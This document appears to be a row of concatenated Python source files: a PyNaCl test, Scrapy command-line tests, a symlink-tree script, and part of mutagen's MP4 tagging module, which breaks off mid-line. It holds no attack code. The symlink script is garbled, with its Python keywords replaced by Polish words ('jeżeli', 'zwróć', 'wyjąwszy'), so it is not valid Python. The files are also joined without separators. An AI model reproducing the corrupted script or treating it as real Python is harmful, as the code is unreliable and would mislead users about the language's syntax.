9 values
# Copyright 2013 Donald Stufft and individual contributors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import, division, print_function import nacl.utils def test_random_bytes_produces(): assert len(nacl.utils.random(16)) == 16 def test_random_bytes_produces_different_bytes(): assert nacl.utils.random(16) != nacl.utils.random(16)
import os import sys import subprocess import tempfile from time import sleep from os.path import exists, join, abspath from shutil import rmtree, copytree from tempfile import mkdtemp import six from twisted.trial import unittest from twisted.internet import defer import scrapy from scrapy.utils.python import to_native_str from scrapy.utils.python import retry_on_eintr from scrapy.utils.test import get_testenv from scrapy.utils.testsite import SiteTest from scrapy.utils.testproc import ProcessTest class ProjectTest(unittest.TestCase): project_name = 'testproject' def setUp(self): self.temp_path = mkdtemp() self.cwd = self.temp_path self.proj_path = join(self.temp_path, self.project_name) self.proj_mod_path = join(self.proj_path, self.project_name) self.env = get_testenv() def tearDown(self): rmtree(self.temp_path) def call(self, *new_args, **kwargs): with tempfile.TemporaryFile() as out: args = (sys.executable, '-m', 'scrapy.cmdline') + new_args return subprocess.call(args, stdout=out, stderr=out, cwd=self.cwd, env=self.env, **kwargs) def proc(self, *new_args, **kwargs): args = (sys.executable, '-m', 'scrapy.cmdline') + new_args p = subprocess.Popen(args, cwd=self.cwd, env=self.env, stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs) waited = 0 interval = 0.2 while p.poll() is None: sleep(interval) waited += interval if waited > 15: p.kill() assert False, 'Command took too much time to complete' return p class StartprojectTest(ProjectTest): def test_startproject(self): self.assertEqual(0, self.call('startproject', self.project_name)) assert exists(join(self.proj_path, 'scrapy.cfg')) assert exists(join(self.proj_path, 'testproject')) assert exists(join(self.proj_mod_path, '__init__.py')) assert exists(join(self.proj_mod_path, 'items.py')) assert exists(join(self.proj_mod_path, 'pipelines.py')) assert exists(join(self.proj_mod_path, 'settings.py')) assert exists(join(self.proj_mod_path, 'spiders', '__init__.py')) self.assertEqual(1, self.call('startproject', self.project_name)) self.assertEqual(1, self.call('startproject', 'wrong---project---name')) self.assertEqual(1, self.call('startproject', 'sys')) class StartprojectTemplatesTest(ProjectTest): def setUp(self): super(StartprojectTemplatesTest, self).setUp() self.tmpl = join(self.temp_path, 'templates') self.tmpl_proj = join(self.tmpl, 'project') def test_startproject_template_override(self): copytree(join(scrapy.__path__[0], 'templates'), self.tmpl) with open(join(self.tmpl_proj, 'root_template'), 'w'): pass assert exists(join(self.tmpl_proj, 'root_template')) args = ['--set', 'TEMPLATES_DIR=%s' % self.tmpl] p = self.proc('startproject', self.project_name, *args) out = to_native_str(retry_on_eintr(p.stdout.read)) self.assertIn("New Scrapy project %r, using template directory" % self.project_name, out) self.assertIn(self.tmpl_proj, out) assert exists(join(self.proj_path, 'root_template')) class CommandTest(ProjectTest): def setUp(self): super(CommandTest, self).setUp() self.call('startproject', self.project_name) self.cwd = join(self.temp_path, self.project_name) self.env['SCRAPY_SETTINGS_MODULE'] = '%s.settings' % self.project_name class GenspiderCommandTest(CommandTest): def test_arguments(self): # only pass one argument. spider script shouldn't be created self.assertEqual(2, self.call('genspider', 'test_name')) assert not exists(join(self.proj_mod_path, 'spiders', 'test_name.py')) # pass two arguments <name> <domain>. spider script should be created self.assertEqual(0, self.call('genspider', 'test_name', 'test.com')) assert exists(join(self.proj_mod_path, 'spiders', 'test_name.py')) def test_template(self, tplname='crawl'): args = ['--template=%s' % tplname] if tplname else [] spname = 'test_spider' p = self.proc('genspider', spname, 'test.com', *args) out = to_native_str(retry_on_eintr(p.stdout.read)) self.assertIn("Created spider %r using template %r in module" % (spname, tplname), out) self.assertTrue(exists(join(self.proj_mod_path, 'spiders', 'test_spider.py'))) p = self.proc('genspider', spname, 'test.com', *args) out = to_native_str(retry_on_eintr(p.stdout.read)) self.assertIn("Spider %r already exists in module" % spname, out) def test_template_basic(self): self.test_template('basic') def test_template_csvfeed(self): self.test_template('csvfeed') def test_template_xmlfeed(self): self.test_template('xmlfeed') def test_list(self): self.assertEqual(0, self.call('genspider', '--list')) def test_dump(self): self.assertEqual(0, self.call('genspider', '--dump=basic')) self.assertEqual(0, self.call('genspider', '-d', 'basic')) def test_same_name_as_project(self): self.assertEqual(2, self.call('genspider', self.project_name)) assert not exists(join(self.proj_mod_path, 'spiders', '%s.py' % self.project_name)) class MiscCommandsTest(CommandTest): def test_list(self): self.assertEqual(0, self.call('list')) class RunSpiderCommandTest(CommandTest): def test_runspider(self): tmpdir = self.mktemp() os.mkdir(tmpdir) fname = abspath(join(tmpdir, 'myspider.py')) with open(fname, 'w') as f: f.write(""" import scrapy class MySpider(scrapy.Spider): name = 'myspider' def start_requests(self): self.logger.debug("It Works!") return [] """) p = self.proc('runspider', fname) log = to_native_str(p.stderr.read()) self.assertIn("DEBUG: It Works!", log) self.assertIn("INFO: Spider opened", log) self.assertIn("INFO: Closing spider (finished)", log) self.assertIn("INFO: Spider closed (finished)", log) def test_runspider_no_spider_found(self): tmpdir = self.mktemp() os.mkdir(tmpdir) fname = abspath(join(tmpdir, 'myspider.py')) with open(fname, 'w') as f: f.write(""" from scrapy.spiders import Spider """) p = self.proc('runspider', fname) log = to_native_str(p.stderr.read()) self.assertIn("No spider found in file", log) def test_runspider_file_not_found(self): p = self.proc('runspider', 'some_non_existent_file') log = to_native_str(p.stderr.read()) self.assertIn("File not found: some_non_existent_file", log) def test_runspider_unable_to_load(self): tmpdir = self.mktemp() os.mkdir(tmpdir) fname = abspath(join(tmpdir, 'myspider.txt')) with open(fname, 'w') as f: f.write("") p = self.proc('runspider', fname) log = to_native_str(p.stderr.read()) self.assertIn("Unable to load", log) class ParseCommandTest(ProcessTest, SiteTest, CommandTest): command = 'parse' def setUp(self): super(ParseCommandTest, self).setUp() self.spider_name = 'parse_spider' fname = abspath(join(self.proj_mod_path, 'spiders', 'myspider.py')) with open(fname, 'w') as f: f.write(""" import scrapy class MySpider(scrapy.Spider): name = '{0}' def parse(self, response): if getattr(self, 'test_arg', None): self.logger.debug('It Works!') return [scrapy.Item(), dict(foo='bar')] """.format(self.spider_name)) fname = abspath(join(self.proj_mod_path, 'pipelines.py')) with open(fname, 'w') as f: f.write(""" import logging class MyPipeline(object): component_name = 'my_pipeline' def process_item(self, item, spider): logging.info('It Works!') return item """) fname = abspath(join(self.proj_mod_path, 'settings.py')) with open(fname, 'a') as f: f.write(""" ITEM_PIPELINES = {'%s.pipelines.MyPipeline': 1} """ % self.project_name) @defer.inlineCallbacks def test_spider_arguments(self): _, _, stderr = yield self.execute(['--spider', self.spider_name, '-a', 'test_arg=1', '-c', 'parse', self.url('/html')]) self.assertIn("DEBUG: It Works!", to_native_str(stderr)) @defer.inlineCallbacks def test_pipelines(self): _, _, stderr = yield self.execute(['--spider', self.spider_name, '--pipelines', '-c', 'parse', self.url('/html')]) self.assertIn("INFO: It Works!", to_native_str(stderr)) @defer.inlineCallbacks def test_parse_items(self): status, out, stderr = yield self.execute( ['--spider', self.spider_name, '-c', 'parse', self.url('/html')] ) self.assertIn("""[{}, {'foo': 'bar'}]""", to_native_str(out)) class BenchCommandTest(CommandTest): def test_run(self): p = self.proc('bench', '-s', 'LOGSTATS_INTERVAL=0.001', '-s', 'CLOSESPIDER_TIMEOUT=0.01') log = to_native_str(p.stderr.read()) self.assertIn('INFO: Crawled', log) self.assertNotIn('Unhandled Error', log)
#! /usr/bin/env python3 # linktree # # Make a copy of a directory tree przy symbolic links to all files w the # original tree. # All symbolic links go to a special symbolic link at the top, so you # can easily fix things jeżeli the original source tree moves. # See also "mkreal". # # usage: mklinks oldtree newtree zaimportuj sys, os LINK = '.LINK' # Name of special symlink at the top. debug = 0 def main(): jeżeli nie 3 <= len(sys.argv) <= 4: print('usage:', sys.argv[0], 'oldtree newtree [linkto]') zwróć 2 oldtree, newtree = sys.argv[1], sys.argv[2] jeżeli len(sys.argv) > 3: link = sys.argv[3] link_may_fail = 1 inaczej: link = LINK link_may_fail = 0 jeżeli nie os.path.isdir(oldtree): print(oldtree + ': nie a directory') zwróć 1 spróbuj: os.mkdir(newtree, 0o777) wyjąwszy OSError jako msg: print(newtree + ': cannot mkdir:', msg) zwróć 1 linkname = os.path.join(newtree, link) spróbuj: os.symlink(os.path.join(os.pardir, oldtree), linkname) wyjąwszy OSError jako msg: jeżeli nie link_may_fail: print(linkname + ': cannot symlink:', msg) zwróć 1 inaczej: print(linkname + ': warning: cannot symlink:', msg) linknames(oldtree, newtree, link) zwróć 0 def linknames(old, new, link): jeżeli debug: print('linknames', (old, new, link)) spróbuj: names = os.listdir(old) wyjąwszy OSError jako msg: print(old + ': warning: cannot listdir:', msg) zwróć dla name w names: jeżeli name nie w (os.curdir, os.pardir): oldname = os.path.join(old, name) linkname = os.path.join(link, name) newname = os.path.join(new, name) jeżeli debug > 1: print(oldname, newname, linkname) jeżeli os.path.isdir(oldname) oraz \ nie os.path.islink(oldname): spróbuj: os.mkdir(newname, 0o777) ok = 1 wyjąwszy: print(newname + \ ': warning: cannot mkdir:', msg) ok = 0 jeżeli ok: linkname = os.path.join(os.pardir, linkname) linknames(oldname, newname, linkname) inaczej: os.symlink(linkname, newname) jeżeli __name__ == '__main__': sys.exit(main())
# -*- coding: utf-8 -*- # Copyright (C) 2006 Joe Wreschnig # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License version 2 as # published by the Free Software Foundation. """Read and write MPEG-4 audio files with iTunes metadata. This module will read MPEG-4 audio information and metadata, as found in Apple's MP4 (aka M4A, M4B, M4P) files. There is no official specification for this format. The source code for TagLib, FAAD, and various MPEG specifications at * http://developer.apple.com/documentation/QuickTime/QTFF/ * http://www.geocities.com/xhelmboyx/quicktime/formats/mp4-layout.txt * http://standards.iso.org/ittf/PubliclyAvailableStandards/\ c041828_ISO_IEC_14496-12_2005(E).zip * http://wiki.multimedia.cx/index.php?title=Apple_QuickTime were all consulted. """ import struct import sys from mutagen import FileType, Metadata, StreamInfo from mutagen._constants import GENRES from mutagen._util import (cdata, insert_bytes, DictProxy, MutagenError, hashable, enum) from mutagen._compat import (reraise, PY2, string_types, text_type, chr_, iteritems, PY3, cBytesIO) from ._atom import Atoms, Atom, AtomError from ._util import parse_full_atom from ._as_entry import AudioSampleEntry, ASEntryError class error(IOError, MutagenError): pass class MP4MetadataError(error): pass class MP4StreamInfoError(error): pass class MP4MetadataValueError(ValueError, MP4MetadataError): pass __all__ = ['MP4', 'Open', 'delete', 'MP4Cover', 'MP4FreeForm', 'AtomDataType','MediaKind', 'HDVideo', 'ContentRating'] @enum class AtomDataType(object): """Enum for `dataformat` attribute of MP4FreeForm. .. versionadded:: 1.25 """ IMPLICIT = 0 """for use with tags for which no type needs to be indicated because only one type is allowed""" UTF8 = 1 """without any count or null terminator""" UTF16 = 2 """also known as UTF-16BE""" SJIS = 3 """deprecated unless it is needed for special Japanese characters""" HTML = 6 """the HTML file header specifies which HTML version""" XML = 7 """the XML header must identify the DTD or schemas""" UUID = 8 """also known as GUID; stored as 16 bytes in binary (valid as an ID)""" ISRC = 9 """stored as UTF-8 text (valid as an ID)""" MI3P = 10 """stored as UTF-8 text (valid as an ID)""" GIF = 12 """(deprecated) a GIF image""" JPEG = 13 """a JPEG image""" PNG = 14 """PNG image""" URL = 15 """absolute, in UTF-8 characters""" DURATION = 16 """in milliseconds, 32-bit integer""" DATETIME = 17 """in UTC, counting seconds since midnight, January 1, 1904; 32 or 64-bits""" GENRES = 18 """a list of enumerated values""" INTEGER = 21 """a signed big-endian integer with length one of { 1,2,3,4,8 } bytes""" RIAA_PA = 24 """RIAA parental advisory; { -1=no, 1=yes, 0=unspecified }, 8-bit ingteger""" UPC = 25 """Universal Product Code, in text UTF-8 format (valid as an ID)""" BMP = 27 """Windows bitmap image""" @hashable class MP4Cover(bytes): """A cover artwork. Attributes: * imageformat -- format of the image (either FORMAT_JPEG or FORMAT_PNG) """ FORMAT_JPEG = AtomDataType.JPEG FORMAT_PNG = AtomDataType.PNG def __new__(cls, data, *args, **kwargs): return bytes.__new__(cls, data) def __init__(self, data, imageformat=FORMAT_JPEG): self.imageformat = imageformat __hash__ = bytes.__hash__ def __eq__(self, other): if not isinstance(other, MP4Cover): return NotImplemented if not bytes.__eq__(self, other): return False if self.imageformat != other.imageformat: return False return True def __ne__(self, other): return not self.__eq__(other) def __repr__(self): return "%s(%r, %r)" % ( type(self).__name__, bytes(self), AtomDataType(self.imageformat)) @hashable class MP4FreeForm(bytes): """A freeform value. Attributes: * dataformat -- format of the data (see AtomDataType) """ FORMAT_DATA = AtomDataType.IMPLICIT # deprecated FORMAT_TEXT = AtomDataType.UTF8 # deprecated def __new__(cls, data, *args, **kwargs): return bytes.__new__(cls, data) def __init__(self, data, dataformat=AtomDataType.UTF8, version=0): self.dataformat = dataformat self.version = version __hash__ = bytes.__hash__ def __eq__(self, other): if not isinstance(other, MP4FreeForm): return NotImplemented if not bytes.__eq__(self, other): return False if self.dataformat != other.dataformat: return False if self.version != other.version: return False return True def __ne__(self, other): return not self.__eq__(other) def __repr__(self): return "%s(%r, %r)" % ( type(self).__name__, bytes(self), AtomDataType(self.dataformat)) def _name2key(name): if PY2: return name return name.decode("latin-1") def _key2name(key): if PY2: return key return key.encode("latin-1") class MP4Tags(DictProxy, Metadata): r"""Dictionary containing Apple iTunes metadata list key/values. Keys are four byte identifiers, except for freeform ('----') keys. Values are usually unicode strings, but some atoms have a special structure: Text values (multiple values per key are supported): * '\\xa9nam' -- track title * '\\xa9alb' -- album * '\\xa9ART' -- artist * 'aART' -- album artist * '\\xa9wrt' -- composer * '\\xa9day' -- year * '\\xa9cmt' -- comment * 'desc' -- description (usually used in podcasts) * 'purd' -- purchase date * '\\xa9grp' -- grouping * '\\xa9gen' -- genre * '\\xa9lyr' -- lyrics * 'purl' -- podcast URL * 'egid' -- podcast episode GUID * 'catg' -- podcast category * 'keyw' -- podcast keywords * '\\xa9too' -- encoded by * 'cprt' -- copyright * 'soal' -- album sort order * 'soaa' -- album artist sort order * 'soar' -- artist sort order * 'sonm' -- title sort order * 'soco' -- composer sort order * 'sosn' -- show sort order * 'tvsh' -- show name Boolean values: * 'cpil' -- part of a compilation * 'pgap' -- part of a gapless album * 'pcst' -- podcast (iTunes reads this only on import) Tuples of ints (multiple values per key are supported): * 'trkn' -- track number, total tracks * 'disk' -- disc number, total discs Others: * 'tmpo' -- tempo/BPM, 16 bit int * 'covr' -- cover artwork, list of MP4Cover objects (which are tagged strs) * 'gnre' -- ID3v1 genre. Not supported, use '\\xa9gen' instead. The freeform '----' frames use a key in the format '----:mean:name' where 'mean' is usually 'com.apple.iTunes' and 'name' is a unique identifier for this frame. The value is a str, but is probably text that can be decoded as UTF-8. Multiple values per key are supported. MP4 tag data cannot exist outside of the structure of an MP4 file, so this class should not be manually instantiated. Unknown non-text tags and tags that failed to parse will be written back as is. """ def __init__(self, *args, **kwargs): self._failed_atoms = {} super(MP4Tags, self).__init__(*args, **kwargs) def load(self, atoms, fileobj): try: ilst = atoms[b"moov.udta.meta.ilst"] except KeyError as key: raise MP4MetadataError(key) for atom in ilst.children: ok, data = atom.read(fileobj) if not ok: raise MP4MetadataError("Not enough data") try: if atom.name in self.__atoms: info = self.__atoms[atom.name] info[0](self, atom, data) else: # unknown atom, try as text self.__parse_text(atom, data, implicit=False) except MP4MetadataError: # parsing failed, save them so we can write them back key = _name2key(atom.name) self._failed_atoms.setdefault(key, []).append(data) def __setitem__(self, key, value): if not isinstance(key, str): raise TypeError("key has to be str") super(MP4Tags, self).__setitem__(key, value) @classmethod def _can_load(cls, atoms): return b"moov.udta.meta.ilst" in atoms @staticmethod def _key_sort(item): (key, v) = item # iTunes always writes the tags in order of "relevance", try # to copy it as closely as possible. order = ["\xa9nam", "\xa9ART", "\xa9wrt", "\xa9alb", "\xa9gen", "gnre", "trkn", "disk", "\xa9day", "cpil", "pgap", "pcst", "tmpo", "\xa9too", "----", "covr", "\xa9lyr", "stik", "tvsh", "tven", "tvsn", "tves", "tvnn"] order = dict(zip(order, range(len(order)))) last = len(order) # If there's no key-based way to distinguish, order by length. # If there's still no way, go by string comparison on the # values, so we at least have something determinstic. return (order.get(key[:4], last), len(repr(v)), repr(v)) def save(self, filename): """Save the metadata to the given filename.""" values = [] items = sorted(self.items(), key=self._key_sort) for key, value in items: atom_name = _key2name(key)[:4] if atom_name in self.__atoms: render_func = self.__atoms[atom_name][1] else: render_func = type(self).__render_text try: if value: values.append(render_func(self, key, value)) except (TypeError, ValueError) as s: reraise(MP4MetadataValueError, s, sys.exc_info()[2]) for key, failed in iteritems(self._failed_atoms): # don't write atoms back if we have added a new one with # the same name, this excludes freeform which can have # multiple atoms with the same key (most parsers seem to be able # to handle that) if key in self: assert _key2name(key) != b"----" continue for data in failed: values.append(Atom.render(_key2name(key), data)) data = Atom.render(b"ilst", b"".join(values)) # Find the old atoms. with open(filename, "rb+") as fileobj: try: atoms = Atoms(fileobj) except AtomError as err: reraise(error, err, sys.exc_info()[2]) try: path = atoms.path(b"moov", b"udta", b"meta", b"ilst") except KeyError: self.__save_new(fileobj, atoms, data) else: self.__save_existing(fileobj, atoms, path, data) def __pad_ilst(self, data, length=None): if length is None: length = ((len(data) + 1023) & ~1023) - len(data) return Atom.render(b"free", b"\x00" * length) def __save_new(self, fileobj, atoms, ilst): hdlr = Atom.render(b"hdlr", b"\x00" * 8 + b"mdirappl" + b"\x00" * 9) meta = Atom.render( b"meta", b"\x00\x00\x00\x00" + hdlr + ilst + self.__pad_ilst(ilst)) try: path = atoms.path(b"moov", b"udta") except KeyError: # moov.udta not found -- create one path = atoms.path(b"moov") meta = Atom.render(b"udta", meta) offset = path[-1].offset + 8 insert_bytes(fileobj, len(meta), offset) fileobj.seek(offset) fileobj.write(meta) self.__update_parents(fileobj, path, len(meta)) self.__update_offsets(fileobj, atoms, len(meta), offset) def __save_existing(self, fileobj, atoms, path, data): # Replace the old ilst atom. ilst = path.pop() offset = ilst.offset length = ilst.length # Check for padding "free" atoms meta = path[-1] index = meta.children.index(ilst) try: prev = meta.children[index - 1] if prev.name == b"free": offset = prev.offset length += prev.length except IndexError: pass try: next = meta.children[index + 1] if next.name == b"free": length += next.length except IndexError: pass delta = len(data) - length if delta > 0 or (delta < 0 and delta > -8): data += self.__pad_ilst(data) delta = len(data) - length insert_bytes(fileobj, delta, offset) elif delta < 0: data += self.__pad_ilst(data, -delta - 8) delta = 0 fileobj.seek(offset) fileobj.write(data) self.__update_parents(fileobj, path, delta) self.__update_offsets(fileobj, atoms, delta, offset) def __update_parents(self, fileobj, path, delta): """Update all parent atoms with the new size.""" for atom in path: fileobj.seek(atom.offset) size = cdata.uint_be(fileobj.read(4)) if size == 1: # 64bit # skip name (4B) and read size (8B) size = cdata.ulonglong_be(fileobj.read(12)[4:]) fileobj.seek(atom.offset + 8) fileobj.write(cdata.to_ulonglong_be(size + delta)) else: # 32bit fileobj.seek(atom.offset) fileobj.write(cdata.to_uint_be(size + delta)) def __update_offset_table(self, fileobj, fmt, atom, delta, offset): """Update offset table in the specified atom.""" if atom.offset > offset: atom.offset += delta fileobj.seek(atom.offset + 12) data = fileobj.read(atom.length - 12) fmt = fmt % cdata.uint_be(data[:4]) offsets = struct.unpack(fmt, data[4:]) offsets = [o + (0, delta)[offset < o] for o in offsets] fileobj.seek(atom.offset + 16) fileobj.write(struct.pack(fmt, *offsets)) def __update_tfhd(self, fileobj, atom, delta, offset): if atom.offset > offset: atom.offset += delta fileobj.seek(atom.offset + 9) data = fileobj.read(atom.length - 9) flags = cdata.uint_be(b"\x00" + data[:3]) if flags & 1: o = cdata.ulonglong_be(data[7:15]) if o > offset: o += delta fileobj.seek(atom.offset + 16) fileobj.write(cdata.to_ulonglong_be(o)) def __update_offsets(self, fileobj, atoms, delta, offset): """Update offset tables in all 'stco' and 'co64' atoms.""" if delta == 0: return moov = atoms[b"moov"] for atom in moov.findall(b'stco', True): self.__update_offset_table(fileobj, ">%dI", atom, delta, offset) for atom in moov.findall(b'co64', True): self.__update_offset_table(fileobj, ">%dQ", atom, delta, offset) try: for atom in atoms[b"moof"].findall(b'tfhd', True): self.__update_tfhd(fileobj, atom, delta, offset) except KeyError: pass def __parse_data(self, atom, data): pos = 0 while pos < atom.length - 8: head = data[pos:pos + 12] if len(head) != 12: raise MP4MetadataError("truncated atom % r" % atom.name) length, name = struct.unpack(">I4s", head[:8]) version = ord(head[8:9]) flags = struct.unpack(">I", b"\x00" + head[9:12])[0] if name != b"data": raise MP4MetadataError( "unexpected atom %r inside %r" % (name, atom.name)) chunk = data[pos + 16:pos + length] if len(chunk) != length - 16: raise MP4MetadataError("truncated atom % r" % atom.name) yield version, flags, chunk pos += length def __add(self, key, value, single=False): assert isinstance(key, str) if single: self[key] = value else: self.setdefault(key, []).extend(value) def __render_data(self, key, version, flags, value): return Atom.render(_key2name(key), b"".join([ Atom.render( b"data", struct.pack(">2I", version << 24 | flags, 0) + data) for data in value])) def __parse_freeform(self, atom, data): length = cdata.uint_be(data[:4]) mean = data[12:length] pos = length length = cdata.uint_be(data[pos:pos + 4]) name = data[pos + 12:pos + length] pos += length value = [] while pos < atom.length - 8: length, atom_name = struct.unpack(">I4s", data[pos:pos + 8]) if atom_name != b"data": raise MP4MetadataError( "unexpected atom %r inside %r" % (atom_name, atom.name)) version = ord(data[pos + 8:pos + 8 + 1]) flags = struct.unpack(">I", b"\x00" + data[pos + 9:pos + 12])[0] value.append(MP4FreeForm(data[pos + 16:pos + length], dataformat=flags, version=version)) pos += length key = _name2key(atom.name + b":" + mean + b":" + name) self.__add(key, value) def __render_freeform(self, key, value): if isinstance(value, bytes): value = [value] dummy, mean, name = _key2name(key).split(b":", 2) mean = struct.pack(">I4sI", len(mean) + 12, b"mean", 0) + mean name = struct.pack(">I4sI", len(name) + 12, b"name", 0) + name data = b"" for v in value: flags = AtomDataType.UTF8 version = 0 if isinstance(v, MP4FreeForm): flags = v.dataformat version = v.version data += struct.pack( ">I4s2I", len(v) + 16, b"data", version << 24 | flags, 0) data += v.encode('UTF-8') return Atom.render(b"----", mean + name + data) def __parse_pair(self, atom, data): key = _name2key(atom.name) values = [struct.unpack(">2H", d[2:6]) for version, flags, d in self.__parse_data(atom, data)] self.__add(key, values) def __render_pair(self, key, value): data = [] for (track, total) in value: if 0 <= track < 1 << 16 and 0 <= total < 1 << 16: data.append(struct.pack(">4H", 0, track, total, 0)) else: raise MP4MetadataValueError( "invalid numeric pair %r" % ((track, total),)) return self.__render_data(key, 0, AtomDataType.IMPLICIT, data) def __render_pair_no_trailing(self, key, value): data = [] for (track, total) in value: if 0 <= track < 1 << 16 and 0 <= total < 1 << 16: data.append(struct.pack(">3H", 0, track, total)) else: raise MP4MetadataValueError( "invalid numeric pair %r" % ((track, total),)) return self.__render_data(key, 0, AtomDataType.IMPLICIT, data) def __parse_genre(self, atom, data): values = [] for version, flags, data in self.__parse_data(atom, data): # version = 0, flags = 0 if len(data) != 2: raise MP4MetadataValueError("invalid genre") genre = cdata.short_be(data) # Translate to a freeform genre. try: genre = GENRES[genre - 1] except IndexError: # this will make us write it back at least raise MP4MetadataValueError("unknown genre") values.append(genre) key = _name2key(b"\xa9gen") self.__add(key, values) def __parse_tempo(self, atom, data): values = [] for version, flags, data in self.__parse_data(atom, data): # version = 0, flags = 0 or 21 if len(data) != 2: raise MP4MetadataValueError("invalid tempo") values.append(cdata.ushort_be(data)) key = _name2key(atom.name) self.__add(key, values) def __render_tempo(self, key, value): try: if len(value) == 0: return self.__render_data(key, 0, AtomDataType.INTEGER, b"") if (min(value) < 0) or (max(value) >= 2 ** 16): raise MP4MetadataValueError( "invalid 16 bit integers: %r" % value) except TypeError: raise MP4MetadataValueError( "tmpo must be a list of 16 bit integers") values = [cdata.to_ushort_be(v) for v in value] return self.__render_data(key, 0, AtomDataType.INTEGER, values) def __parse_bool(self, atom, data): for version, flags, data in self.__parse_data(atom, data): if len(data) != 1: raise MP4MetadataValueError("invalid bool") value = bool(ord(data)) key = _name2key(atom.name) self.__add(key, value, single=True) def __render_bool(self, key, value): return self.__render_data( key, 0, AtomDataType.INTEGER, [chr_(bool(value))]) def __parse_cover(self, atom, data): values = [] pos = 0 while pos < atom.length - 8: length, name, imageformat = struct.unpack(">I4sI", data[pos:pos + 12]) if name != b"data": if name == b"name": pos += length continue raise MP4MetadataError( "unexpected atom %r inside 'covr'" % name) if imageformat not in (MP4Cover.FORMAT_JPEG, MP4Cover.FORMAT_PNG): # Sometimes AtomDataType.IMPLICIT or simply wrong. # In all cases it was jpeg, so default to it imageformat = MP4Cover.FORMAT_JPEG cover = MP4Cover(data[pos + 16:pos + length], imageformat) values.append(cover) pos += length key = _name2key(atom.name) self.__add(key, values) def __render_cover(self, key, value): atom_data = [] for cover in value: try: imageformat = cover.imageformat except AttributeError: imageformat = MP4Cover.FORMAT_JPEG atom_data.append(Atom.render( b"data", struct.pack(">2I", imageformat, 0) + cover)) return Atom.render(_key2name(key), b"".join(atom_data)) def __parse_text(self, atom, data, implicit=True): # implicit = False, for parsing unknown atoms only take utf8 ones. # For known ones we can assume the implicit are utf8 too. values = [] for version, flags, atom_data in self.__parse_data(atom, data): if implicit: if flags not in (AtomDataType.IMPLICIT, AtomDataType.UTF8): raise MP4MetadataError( "Unknown atom type %r for %r" % (flags, atom.name)) else: if flags != AtomDataType.UTF8: raise MP4MetadataError( "%r is not text, ignore" % atom.name) try: text = atom_data.decode("utf-8") except UnicodeDecodeError as e: raise MP4MetadataError("%s: %s" % (_name2key(atom.name), e)) values.append(text) key = _name2key(atom.name) self.__add(key, values) def __render_text(self, key, value, flags=AtomDataType.UTF8): if isinstance(value, string_types): value = [value] encoded = [] for v in value: if not isinstance(v, text_type): if PY3: raise TypeError("%r not str" % v) v = v.decode("utf-8") encoded.append(v.encode("utf-8")) return self.__render_data(key, 0, flags, encoded) def __render_8int(self, key, value): try: if len(value) == 0: return self.__render_data(key, 0x07, b"") if min(value) < 0 or max(value) >= 2 ** 8: raise MP4MetadataValueError( "invalid 8 bit integers: %r" % value) except TypeError: raise MP4MetadataValueError( "%s must be a list of 8 bit integers" % (key)) values = list(map(cdata.to_uchar_be, value)) return self.__render_data(key, 0, 0x07, values) def __render_32int(self, key, value): try: if len(value) == 0: return self.__render_data(key, 0x31, b"") if min(value) < 0 or max(value) >= 2 ** 32: raise MP4MetadataValueError( "invalid 32 bit integers: %r" % value) except TypeError: raise MP4MetadataValueError( "%s must be a list of 32 bit integers" % (key)) values = list(map(cdata.to_uint_be, value)) return self.__render_data(key, 0, 0x31, values) def delete(self, filename): """Remove the metadata from the given filename.""" self._failed_atoms.clear() self.clear() self.save(filename) __atoms = { b"----": (__parse_freeform, __render_freeform), b"trkn": (__parse_pair, __render_pair), b"disk": (__parse_pair, __render_pair_no_trailing), b"gnre": (__parse_genre, None), b"tmpo": (__parse_tempo, __render_tempo), b"cpil": (__parse_bool, __render_bool), b"pgap": (__parse_bool, __render_bool), b"pcst": (__parse_bool, __render_bool), b"covr": (__parse_cover, __render_cover), b"purl": (__parse_text, __render_text), b"egid": (__parse_text, __render_text), b"hdvd": (__parse_text, __render_8int), b"tves": (__parse_text, __render_32int), b"tvsn": (__parse_text, __render_32int), b"stik": (__parse_text, __render_8int), b"rtng": (__parse_text, __render_8int), } # these allow implicit flags and parse as text for name in [b"\xa9nam", b"\xa9alb", b"\xa9ART", b"aART", b"\xa9wrt", b"\xa9day", b"\xa9cmt", b"desc", b"purd", b"\xa9grp", b"\xa9gen", b"\xa9lyr", b"catg", b"keyw", b"\xa9too", b"cprt", b"soal", b"soaa", b"soar", b"sonm", b"soco", b"sosn", b"tvsh", b"tven", b"tvnn"]: __atoms[name] = (__parse_text, __render_text) def pprint(self): values = [] for key, value in iteritems(self): if not isinstance(key, text_type): key = key.decode("latin-1") if key == "covr": values.append("%s=%s" % (key, ", ".join( ["[%d bytes of data]" % len(data) for data in value]))) elif isinstance(value, list): for v in value: values.append("%s=%r" % (key, v)) else: values.append("%s=%r" % (key, value)) return "\n".join(values) class MP4Info(StreamInfo): """MPEG-4 stream information. Attributes: * bitrate -- bitrate in bits per second, as an int * length -- file length in seconds, as a float * channels -- number of audio channels * sample_rate -- audio sampling rate in Hz * bits_per_sample -- bits per sample * codec (string): * if starting with ``"mp4a"`` uses an mp4a audio codec (see the codec parameter in rfc6381 for details e.g. ``"mp4a.40.2"``) * for everything else see a list of possible values at http://www.mp4ra.org/codecs.html e.g. ``"mp4a"``, ``"alac"``, ``"mp4a.40.2"``, ``"ac-3"`` etc. * codec_description (string): Name of the codec used (ALAC, AAC LC, AC-3...). Values might change in the future, use for display purposes only. """ bitrate = 0 channels = 0 sample_rate = 0 bits_per_sample = 0 codec = u"" codec_name = u"" def __init__(self, atoms, fileobj): try: moov = atoms[b"moov"] except KeyError: raise MP4StreamInfoError("not a MP4 file") for trak in moov.findall(b"trak"): hdlr = trak[b"mdia", b"hdlr"] ok, data = hdlr.read(fileobj) if not ok: raise MP4StreamInfoError("Not enough data") if data[8:12] == b"soun": break else: raise MP4StreamInfoError("track has no audio data") mdhd = trak[b"mdia", b"mdhd"] ok, data = mdhd.read(fileobj) if not ok: raise MP4StreamInfoError("Not enough data") try: version, flags, data = parse_full_atom(data) except ValueError as e: raise MP4StreamInfoError(e) if version == 0: offset = 8 fmt = ">2I" elif version == 1: offset = 16 fmt = ">IQ" else: raise MP4StreamInfoError("Unknown mdhd version %d" % version) end = offset + 